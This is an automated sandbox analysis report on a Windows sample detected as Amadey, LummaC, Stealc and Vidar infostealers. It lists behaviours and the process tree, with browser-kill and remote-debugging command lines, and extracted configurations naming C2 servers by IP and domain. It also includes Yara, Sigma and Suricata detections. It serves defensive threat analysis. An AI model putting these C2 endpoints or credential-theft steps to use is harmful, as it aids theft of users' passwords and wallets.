Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1578136
MD5:	7944ebe231d464c760a818b34a636cce
SHA1:	52bdb9427bd7e9d2e2a75bcf5fc76e0e7819a73b
SHA256:	c478f40cfe686bdc076d898a735f2857316a64d8e2d9dc405dde3e0ca8194b7f
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected zgRAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops password protected ZIP file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 2864 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7944EBE231D464C760A818B34A636CCE)

skotes.exe (PID: 1404 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 7944EBE231D464C760A818B34A636CCE)

skotes.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7944EBE231D464C760A818B34A636CCE)

skotes.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7944EBE231D464C760A818B34A636CCE)

1c8dd6ecf9.exe (PID: 6080 cmdline: "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe" MD5: 8E89923EFBAC42F80F4E7FC0DC7AAE45)

6523f73121.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe" MD5: 5081EA72759BA0DEA91A56403FF62DC6)

chrome.exe (PID: 6716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2080,i,17300030453258231598,16227378624072536825,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 7220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2044,i,13123127802507167736,11492811734729124769,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

dfa5c95181.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe" MD5: 629A3EAF01FB818CD0B1964E454BA39B)

taskkill.exe (PID: 6780 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6656 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4000 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5948 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6684 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6504 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

4fe110f830.exe (PID: 6684 cmdline: "C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe" MD5: C6E7C724DD8F29F45E6686E0ADD2AD81)

9bc4f8a43d.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 3160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 2128 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 8088 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7232 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3908 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7072 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

1fa18d372f.exe (PID: 1456 cmdline: "C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe" MD5: C00A67D527EF38DC6F49D0AD7F13B393)

1c8dd6ecf9.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe" MD5: 8E89923EFBAC42F80F4E7FC0DC7AAE45)

1c8dd6ecf9.exe (PID: 3924 cmdline: "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe" MD5: 8E89923EFBAC42F80F4E7FC0DC7AAE45)

firefox.exe (PID: 5752 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 380 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6216 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca8f1ef1-5ad9-4ea6-a4b3-1032a2574296} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4b686d710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8100 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1376 -parentBuildID 20230927232528 -prefsHandle 4416 -prefMapHandle 4412 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bd7abb-261f-4d61-be3b-96cf981c68b9} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4c7527410 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

6523f73121.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe" MD5: 5081EA72759BA0DEA91A56403FF62DC6)

msedge.exe (PID: 7716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 4860 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2008,i,6347898806173620045,4158636205428793632,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

dfa5c95181.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe" MD5: 629A3EAF01FB818CD0B1964E454BA39B)

taskkill.exe (PID: 2948 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

4fe110f830.exe (PID: 6752 cmdline: "C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe" MD5: C6E7C724DD8F29F45E6686E0ADD2AD81)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "lossekniyyt.click", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat"], "Build id": "9Z1cyc--"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.3659341926.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000003.2165469048.0000000004B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.3764438263.00000000012AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.2761888853.0000000004B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.3755390540.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2133034325.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.3893497573.00000000010B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2163751236.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000003.3894979273.00000000010B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.3202576047.0000000004E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000031.00000002.3396644733.0000000004479000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000003.2997018123.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000031.00000000.3376964125.0000000000E62000.00000002.00000001.01000000.0000001D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: 6523f73121.exe PID: 4132	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 6523f73121.exe PID: 4132	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 6523f73121.exe PID: 4132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6523f73121.exe PID: 4132	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: dfa5c95181.exe PID: 6896	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: 1c8dd6ecf9.exe PID: 3924	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1c8dd6ecf9.exe PID: 3924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1c8dd6ecf9.exe PID: 3924	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.ea0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
49.2.1fa18d372f.exe.44d94e0.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
49.0.1fa18d372f.exe.e60000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
49.0.1fa18d372f.exe.e60000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
49.2.1fa18d372f.exe.4493198.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
49.2.1fa18d372f.exe.4493198.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
49.2.1fa18d372f.exe.4493198.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
49.2.1fa18d372f.exe.4493198.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xf10c:$s1: file:/// 0x96a23:$s1: file:/// 0xf01c:$s2: {11111-22222-10009-11112} 0xf09c:$s3: {11111-22222-50001-00000} 0x968a7:$s3: {11111-22222-50001-00000} 0x948e7:$s4: get_Module 0xe890:$s5: Reverse 0x84ebe:$s5: Reverse 0x11c92f:$s5: Reverse 0xcd07:$s6: BlockCopy 0x84ba8:$s7: ReadByte 0x96a35:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
49.2.1fa18d372f.exe.44d94e0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
49.2.1fa18d372f.exe.44d94e0.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c8dd6ecf9.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe, ParentProcessId: 4132, ParentProcessName: 6523f73121.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 6716, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c8dd6ecf9.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:17.268735+0100	2028371	3	Unknown Traffic	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:28.725832+0100	2028371	3	Unknown Traffic	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:31.039680+0100	2028371	3	Unknown Traffic	192.168.2.6	49916	172.67.179.109	443	TCP
2024-12-19T10:10:39.816734+0100	2028371	3	Unknown Traffic	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:43.385002+0100	2028371	3	Unknown Traffic	192.168.2.6	49967	172.67.179.109	443	TCP
2024-12-19T10:10:56.497408+0100	2028371	3	Unknown Traffic	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:06.285123+0100	2028371	3	Unknown Traffic	192.168.2.6	50047	104.21.12.88	443	TCP
2024-12-19T10:11:13.085283+0100	2028371	3	Unknown Traffic	192.168.2.6	50072	172.67.179.109	443	TCP
2024-12-19T10:11:14.439770+0100	2028371	3	Unknown Traffic	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:11:21.578304+0100	2028371	3	Unknown Traffic	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:28.979128+0100	2028371	3	Unknown Traffic	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:11:32.043863+0100	2028371	3	Unknown Traffic	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:36.820573+0100	2028371	3	Unknown Traffic	192.168.2.6	50097	104.21.12.88	443	TCP
2024-12-19T10:11:41.000375+0100	2028371	3	Unknown Traffic	192.168.2.6	50117	172.67.179.109	443	TCP
2024-12-19T10:11:48.944320+0100	2028371	3	Unknown Traffic	192.168.2.6	50136	104.21.12.88	443	TCP
2024-12-19T10:11:54.286496+0100	2028371	3	Unknown Traffic	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:11:56.589036+0100	2028371	3	Unknown Traffic	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:11:58.406650+0100	2028371	3	Unknown Traffic	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:01.140413+0100	2028371	3	Unknown Traffic	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:04.871789+0100	2028371	3	Unknown Traffic	192.168.2.6	50152	104.21.12.88	443	TCP
2024-12-19T10:12:07.471674+0100	2028371	3	Unknown Traffic	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:07.516092+0100	2028371	3	Unknown Traffic	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:13.936958+0100	2028371	3	Unknown Traffic	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:15.070181+0100	2028371	3	Unknown Traffic	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:18.133008+0100	2028371	3	Unknown Traffic	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:22.493388+0100	2028371	3	Unknown Traffic	192.168.2.6	50185	172.67.177.88	443	TCP
2024-12-19T10:12:22.509661+0100	2028371	3	Unknown Traffic	192.168.2.6	50184	104.21.12.88	443	TCP
2024-12-19T10:12:22.627875+0100	2028371	3	Unknown Traffic	192.168.2.6	50186	172.67.179.109	443	TCP
2024-12-19T10:12:24.345770+0100	2028371	3	Unknown Traffic	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:12:30.996555+0100	2028371	3	Unknown Traffic	192.168.2.6	50191	172.67.179.109	443	TCP
